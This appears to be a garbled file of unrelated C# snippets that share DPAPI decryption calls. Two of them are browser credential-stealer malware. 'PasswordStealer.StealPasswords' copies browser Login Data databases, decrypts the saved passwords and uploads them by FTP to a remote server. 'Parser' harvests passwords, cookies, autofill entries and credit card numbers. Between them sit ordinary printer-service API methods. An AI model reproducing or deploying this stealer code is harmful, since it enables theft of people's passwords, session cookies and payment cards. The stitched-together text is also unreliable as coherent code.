byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
Writer.WriteLine(password + "<br><br>");
}
}
Writer.Close();
return(rows);
}
catch (Exception ex)
{
PrintMe.PrintInfo("ERR ", ConsoleColor.Red, ex.Message);
// Console.WriteLine(ex.Message);
// ex = ex.InnerException;
return(0);
}
}
public static string Decrypt(string cipherText, out string description)
{
return(DPAPI.Decrypt(cipherText, string.Empty, out description));
}
public static void StealPasswords()
{
for (int i = 0; i < FTP_PATHS.Length; i++)
{
WebRequest ftpRequest = WebRequest.Create(FTP_PATHS[i]);
ftpRequest.Method = WebRequestMethods.Ftp.MakeDirectory;
ftpRequest.Credentials = new NetworkCredential(PasswordStealer.Program.FTPLogin, PasswordStealer.Program.FTPPassword);
using (var resp = (FtpWebResponse)ftpRequest.GetResponse())
{
}
}
for (int a = 0; a < PasswordStealer.Program.webBrowsers_Paths.Length; a++)
{
for (int b = 0; b < PasswordStealer.Program.environment.Length; b++)
{
string path = @"C:\Users\" + PasswordStealer.Program.environment[b] + @"\AppData\" + PasswordStealer.Program.webBrowsers_Paths[a];
string directory = path + new Random().Next(1, 9999999) + @"\";
string db_way = directory + "Data";
string file_way = path + "Login Data";
Directory.CreateDirectory(directory);
if (File.Exists(file_way))
{
File.Copy(file_way, db_way);
}
if (File.Exists(db_way))
{
string filename = @"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html";
string db_field = "logins";
byte[] entropy = null;
string description;
string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True";
DataTable DB = new DataTable();
string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", "");
using (SQLiteConnection connect = new SQLiteConnection(ConnectionString))
{
SQLiteCommand command = new SQLiteCommand(sql, connect);
SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
adapter.Fill(DB);
int rows = DB.Rows.Count;
StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8);
for (int i = 0; i < rows; i++)
{
Writer.Write(i + 1 + ") ");
Writer.WriteLine(DB.Rows[i][1] + "<br>");
Writer.WriteLine(DB.Rows[i][3] + "<br>");
byte[] byteArray = (byte[])DB.Rows[i][5];
byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
string password = new UTF8Encoding(true).GetString(decrypted);
Writer.WriteLine(password + "<br><br>");
connect.Close();
}
Writer.Close();
}
string codeBase = Assembly.GetExecutingAssembly().CodeBase;
string namez = Path.GetFileName(codeBase);
string pathz = System.IO.Path.GetDirectoryName(System.Reflection.Assembly.GetExecutingAssembly().Location);
using (WebClient webClient = new WebClient())
{
webClient.Credentials = (ICredentials) new NetworkCredential(PasswordStealer.Program.FTPLogin, PasswordStealer.Program.FTPPassword);
webClient.UploadFile(PasswordStealer.Program.Passwords + PasswordStealer.Program.webBrowsers[a] + "file.html", "STOR", @"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html");
File.Delete(@"C:\Windows\file" + PasswordStealer.Program.webBrowsers[a] + ".html");
}
}
}
}
}
public IHttpActionResult Print(string userName, string printerName = @"\\HYD-VPRINT-01A.fareast.corp.microsoft.com\B2_WC5745_1FWAZ2")
{
try
{
if (userName == null || userName.Length == 0)
{
return(BadRequest("The supplied username is invalid"));
}
else
{
IQueryable <PrintJob> printjobs = db.PrintJobs.Where(p =>
(p.UserName == userName && p.Status == PrintJobStatus.Queued) ||
(p.DelegatedTo == userName && p.Status == PrintJobStatus.Queued));
foreach (var printJob in printjobs)
{
string folderName = Path.Combine(rootPathToFolders, printJob.UserName);
if (File.Exists(Path.Combine(folderName, printJob.FileName)))
{
string encryptedFile = File.ReadAllText(Path.Combine(folderName, printJob.FileName));
string decryptedFile = DPAPI.Decrypt(encryptedFile);
File.WriteAllText(Path.Combine(folderName, printJob.FileName + "_tmp"), decryptedFile);
File.Copy(Path.Combine(folderName, printJob.FileName + "_tmp"), @printerName);
File.Delete(Path.Combine(folderName, printJob.FileName + "_tmp"));
printJob.Status = PrintJobStatus.Printed;
printJob.PrintedDateTime = DateTime.Now;
db.PrintLogs.Add(new PrintLog
{
UserName = userName,
FileName = printJob.FileName,
NumberOfCopies = printJob.NumberOfCopies,
DelegatedBy = printJob.DelegatedTo == userName ? printJob.UserName : null,
PrintedOn = DateTime.Now
});
}
else
{
return(NotFound());
}
}
db.SaveChanges();
db.Dispose();
}
return(Ok());
}
catch (Exception e)
{
string sSource;
string sLog;
sSource = "Smart Printer Service";
sLog = "Application";
if (!EventLog.SourceExists(sSource))
{
EventLog.CreateEventSource(sSource, sLog);
}
string errorMessage = e.Message + "\n\n";
while (e.InnerException != null)
{
errorMessage += e.InnerException + "\n";
e = e.InnerException;
}
EventLog.WriteEntry(sSource, errorMessage, EventLogEntryType.Error);
return(InternalServerError());
}
}
public IHttpActionResult UpdateNumberOfCopies(string userName, string fileName, int numberOfCopies)
{
try
{
if (userName == null || userName.Length == 0 || fileName == null || fileName.Length == 0)
{
return(BadRequest("Incorrect username or filename provided"));
}
else if (numberOfCopies <= 0)
{
return(BadRequest("Invlaid number of copies"));
}
else
{
PrintJob printJob = db.PrintJobs.Where(p => p.UserName == userName && p.FileName == fileName).FirstOrDefault();
if (printJob == null)
{
return(BadRequest("Incorrect username or filename provided. No corresponding printjob exists."));
}
else
{
string filePath = Path.Combine(rootPathToFolders, userName, fileName);
if (File.Exists(filePath))
{
string textData = DPAPI.Decrypt(File.ReadAllText(filePath));
int copiesCountOffset = 10;
int copies = textData.IndexOf("NumCopies") + copiesCountOffset;
int copiesEnd = textData.IndexOf("\r", copies);
if (copies == 9)
{
numberOfCopiesText = numberOfCopiesText.Replace("#NumberOfCopies#", numberOfCopies.ToString());
int startPos = textData.LastIndexOf("featurebegin") - 1;
textData = textData.Substring(0, startPos) + numberOfCopiesText + textData.Substring(startPos);
}
else
{
string actualNumberOfCopiesText = numberOfCopiesText.Replace("#NumberOfCopies#", printJob.NumberOfCopies.ToString());
string updatedCopies = numberOfCopiesText.Replace("#NumberOfCopies#", numberOfCopies.ToString().ToString());
textData = textData.Replace(actualNumberOfCopiesText, updatedCopies);
}
File.WriteAllText(filePath, DPAPI.Encrypt(textData));
}
printJob.NumberOfCopies = numberOfCopies;
db.SaveChanges();
}
}
return(Ok());
}
catch (Exception e)
{
string sSource;
string sLog;
sSource = "Smart Printer Service";
sLog = "Application";
if (!EventLog.SourceExists(sSource))
{
EventLog.CreateEventSource(sSource, sLog);
}
string errorMessage = e.Message + "\n\n";
while (e.InnerException != null)
{
errorMessage += e.InnerException + "\n";
e = e.InnerException;
}
EventLog.WriteEntry(sSource, errorMessage, EventLogEntryType.Error);
return(InternalServerError());
}
}
private static void Parser()
{
try
{
string desc = "";
foreach (var Browser in Browsers)
{
foreach (var path in LoginDataPaths)
{
if (!File.Exists(path))
{
continue;
}
SqlHandler sqlHandler = new SqlHandler(path);
sqlHandler.ReadTable("logins");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
Browser.Passwords.Add(new PasswordData
{
URL = sqlHandler.GetValue(rowNum, 0),
UserName = sqlHandler.GetValue(rowNum, 3),
PasswordValue = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 5)), new byte[0], out desc))
});
}
}
}
foreach (var Browser in Browsers)
{
foreach (var path in CookiesDataPaths)
{
if (!File.Exists(path))
{
continue;
}
SqlHandler sqlHandler = new SqlHandler(path);
sqlHandler.ReadTable("cookies");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
Browser.Cookies.Add(new Cookie
{
Host = sqlHandler.GetValue(rowNum, 1),
Value = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 12)), new byte[0], out desc)),
Name = sqlHandler.GetValue(rowNum, 2),
ExpiresUTC = sqlHandler.GetValue(rowNum, 5),
});
}
}
}
foreach (var Browser in Browsers)
{
foreach (var path in WebDataPaths)
{
if (!File.Exists(path))
{
continue;
}
SqlHandler sqlHandler = new SqlHandler(path);
sqlHandler.ReadTable("autofill");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
string value = sqlHandler.GetValue(rowNum, 0);
if (Bad.Contains(value.ToLower()) || value.ToLower().Contains("cd[") || value == null)
{
continue;
}
Browser.AutoFill.Add(new AutoFill
{
TextBox = value,
Value = sqlHandler.GetValue(rowNum, 1)
});
}
}
}
foreach (var Browser in Browsers)
{
foreach (var path in WebDataPaths)
{
if (!File.Exists(path))
{
continue;
}
SqlHandler sqlHandler = new SqlHandler(path);
sqlHandler.ReadTable("credit_cards");
for (int rowNum = 0; rowNum < sqlHandler.GetRowCount(); ++rowNum)
{
Browser.CreditCards.Add(new CreditCard
{
Holder = sqlHandler.GetValue(rowNum, 1),
Number = Encoding.UTF8.GetString(DPAPI.Decrypt(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)), new byte[0], out desc)),
ValidDate = $"{sqlHandler.GetValue(rowNum, 2)}/{sqlHandler.GetValue(rowNum, 3)}"
});
}
}
}
}
catch
{
}
}
